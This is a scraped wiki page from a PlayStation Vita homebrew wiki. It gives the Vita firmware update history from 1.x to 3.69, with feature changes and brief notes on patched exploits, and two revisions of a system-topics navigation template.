* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several Game Exploits, Fieldrunners and others, that were actually undisclosed, got fixed. This disallows the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various exploit titles got fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles got fixed as well.<br />
* Internal firmware changes now prevent the execution of bigger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the reserved 256MB memory for the operating system now free for games.<br />
|-<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploit.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed some bugs in SceNgs<br />
*SSL library updated (along with other networking libraries that uses SceSsl), two new root certificates added<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Template:System&diff=9075Template:System2018-11-06T04:11:25Z<p>Xyz: </p>
<hr />
<div>{{Navbox<br />
|name = System<br />
|title = System<br />
|image = <br />
<br />
|group1 = [[Kernel]]<br />
|list1 = [[File Management]] {{·}} [[Concurrency]] {{·}} [[Interrupts]] {{·}} [[Syscalls]] {{·}} [[SELF Loading]] {{·}} [[Modules#Kernel|Modules]] {{·}} [[Kermit]] {{·}} [[Suspend]] {{·}} [[Error codes]]<br />
<br />
|group2 = Boot<br />
|list2 = [[Security]] {{·}} [[Boot Sequence]] {{·}} [[Boot ROM]] {{·}} [[Kernel Loader]] {{·}} [[Sysroot]]<br />
<br />
|group3 = TrustZone<br />
|list3 = [[Secure World]] {{·}} [[SMC]] {{·}} [[Modules#Secure Kernel|Modules]] {{·}} [[F00D Commands]]<br />
<br />
|group4 = [[Applications]]<br />
|list4 = [[PSP Emulator]] {{·}} [[PSM]] {{·}} [[Web Browser]] {{·}} [[CMA]] {{·}} [[Updater]] {{·}} [[Modules#Application Libraries|Modules]]<br />
<br />
|group5 = Formats<br />
|list5 = [[ARZL]] {{·}} [[PSF]] {{·}} [[PSVIMG]] {{·}} [[Packages]] {{·}} [[PUP]] {{·}} [[PVF]] {{·}} [[SCE]] {{·}} [[SELF]] {{·}} [[SLB2]] {{·}} [[SCECAF]] {{·}} [[keystone]] {{·}} [[sealedkey]] {{·}} [[Syscon Update]] {{·}} [[Communication Processor Update Package|CP Update]] {{·}} [[act.dat]]<br />
<br />
|group6 = Encryption<br />
|list6 = [[Keys]] {{·}} [[Dmac5]]<br />
<br />
}}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Template:System&diff=9073Template:System2018-10-28T22:57:44Z<p>Xyz: </p>
<hr />
<div>{{Navbox<br />
|name = System<br />
|title = System<br />
|image = <br />
<br />
|group1 = [[Kernel]]<br />
|list1 = [[File Management]] {{·}} [[Concurrency]] {{·}} [[Interrupts]] {{·}} [[Syscalls]] {{·}} [[SELF Loading]] {{·}} [[Modules#Kernel|Modules]] {{·}} [[Kermit]] {{·}} [[Suspend]] {{·}} [[Error codes]]<br />
<br />
|group2 = Boot<br />
|list2 = [[Security]] {{·}} [[Boot Sequence]] {{·}} [[Boot ROM]] {{·}} [[Kernel Loader]] {{·}} [[Sysroot]]<br />
<br />
|group3 = TrustZone<br />
|list3 = [[Secure World]] {{·}} [[SMC]] {{·}} [[Modules#Secure Kernel|Modules]] {{·}} [[F00D Commands]]<br />
<br />
|group4 = [[Applications]]<br />
|list4 = [[PSP Emulator]] {{·}} [[PSM]] {{·}} [[Web Browser]] {{·}} [[CMA]] {{·}} [[Updater]] {{·}} [[Modules#Application Libraries|Modules]]<br />
<br />
|group5 = Formats<br />
|list5 = [[ARZL]] {{·}} [[PSF]] {{·}} [[PSVIMG]] {{·}} [[Packages]] {{·}} [[PUP]] {{·}} [[PVF]] {{·}} [[SCE]] {{·}} [[SELF]] {{·}} [[SLB2]] {{·}} [[SCECAF]] {{·}} [[keystone]] {{·}} [[sealedkey]] {{·}} [[Syscon Update]] {{·}} {{·}} [[Communication Processor Update Package]] {{·}} [[act.dat]]<br />
<br />
|group6 = Encryption<br />
|list6 = [[Keys]] {{·}} [[Dmac5]]<br />
<br />
}}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=8910System Software2018-09-11T14:29:55Z<p>Xyz: /* Version 3 */</p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
